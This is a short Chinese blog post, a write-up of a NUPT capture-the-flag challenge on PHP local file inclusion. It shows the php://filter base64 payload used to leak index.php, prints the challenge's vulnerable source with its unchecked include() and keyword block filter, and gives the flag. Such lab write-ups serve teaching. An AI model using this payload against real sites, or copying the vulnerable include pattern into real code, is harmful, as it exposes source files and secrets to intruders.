首页 > 其他 > 详细

南邮 文件包含

时间:2019-04-04 22:01:52      阅读:166      评论:0      收藏:0      [点我收藏+]

打开题目技术分享图片

点击之后

技术分享图片

明显的文件包含漏洞的格式网址,通过php://filter读取index源码-->php://filter/read=convert.base64-encode/resource=index.php
如下

技术分享图片

得到base64 解码

<html>
    <title>asdf</title>
    
<?php
  error_reporting(0);
  if(!$_GET[file]){echo ‘<a href="./index.php?file=show.php">click me? no</a>‘;}
  $file=$_GET[‘file‘];
  if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";
    exit();
  }
  include($file); 
//flag:nctf{edulcni_elif_lacol_si_siht}

?>
</html>

--------------------------------
收获 文件包含漏洞,在url中添加?file=php://filter/read=convert.base64-encode/resource=index.php,读取到base64加密的index.php文件
   

 

南邮 文件包含

原文:https://www.cnblogs.com/islsy/p/10657091.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!